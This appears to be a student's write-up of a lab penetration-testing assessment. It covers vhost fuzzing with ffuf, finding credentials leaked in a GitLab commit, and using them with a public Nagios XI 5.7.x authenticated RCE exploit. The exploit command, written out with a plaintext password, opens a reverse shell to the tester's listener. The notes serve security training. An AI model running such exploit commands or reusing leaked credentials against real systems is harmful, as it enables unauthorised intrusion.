2 - Assessment Part Two

# Initial Enum - `ping` test ![[images/Pasted image 20260201124751.png]] - `nmap` scans ![[images/Pasted image 20260201125446.png]] ![[images/Pasted image 20260201131159.png]] - update `/etc/hosts` to include `gitlab.inlanefreight.local` ![[images/Pasted image 20260201125143.png]] ## Vhost scan - scan for vhosts with `ffuf` ```bash ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://inlanefreight.local/ -H 'Host: FUZZ.inlanefreight.local' -fs 46166 ``` - found `monitoring`, `gitlab`, and `blog` ![[images/Pasted image 20260201125338.png]] - add additional vhosts to `/etc/hosts` ![[images/Pasted image 20260201125709.png]] - visit each of the above vhosts - `blog.inlanefreight.local` > WordPress ![[images/Pasted image 20260201125751.png]] - source code shows indications of wordpress ver 5.8 ![[images/Pasted image 20260201125904.png]] - `monitoring.inlanefreight.local` > Nagios Xi ![[images/Pasted image 20260201125936.png]] - `gitlab.inlanefreight.local` > hosted on port 8180 ![[images/Pasted image 20260201125558.png]] # Gitlab Enum - go to `/help` to enumerate the version ![[images/Pasted image 20260201130113.png]] - go to `/explore` to enumerate projects ![[images/Pasted image 20260201130130.png]] - try to register a test account ![[images/Pasted image 20260201130732.png]] - now when we go to `gitlab.inlanefreight.local:8180/explore` we see more projects ![[images/Pasted image 20260201130909.png]] - drill down into `Nagios Postgresql` in hopes of a password - there's a commit leaking info ![[images/Pasted image 20260201131122.png]] # Nagios Enum - Logging into `monitoring.inlanefreight.local` with the found creds dumps us into the below dashboard ![[images/Pasted image 20260201131400.png]] - Looks like a network monitoring tool similar to PRTG - Noted version - 5.7.5 ![[images/Pasted image 20260201131424.png]] - run `searchsploit nagios` ![[images/Pasted image 20260201131539.png]] - `php/webapps/49422.py` is an authenticated RCE for ver 5.7.x - Mirror `49422.py` ![[images/Pasted image 20260201131623.png]] - view code > looks like we input info as arguments ![[images/Pasted image 20260201131708.png]] - try to run the script as below after setting up a listener ```bash python3 49422.py http://monitoring.inlanefreight.local nagiosadmin "oilaKglm7M09@CPL&^lC" 10.10.14.196 8443 ``` - looks like the payload went through ![[images/Pasted image 20260201132103.png]] - we have a hit on the listener! ![[images/Pasted image 20260201132136.png]] - now we just need to `cat` the flag ![[images/Pasted image 20260201132301.png]]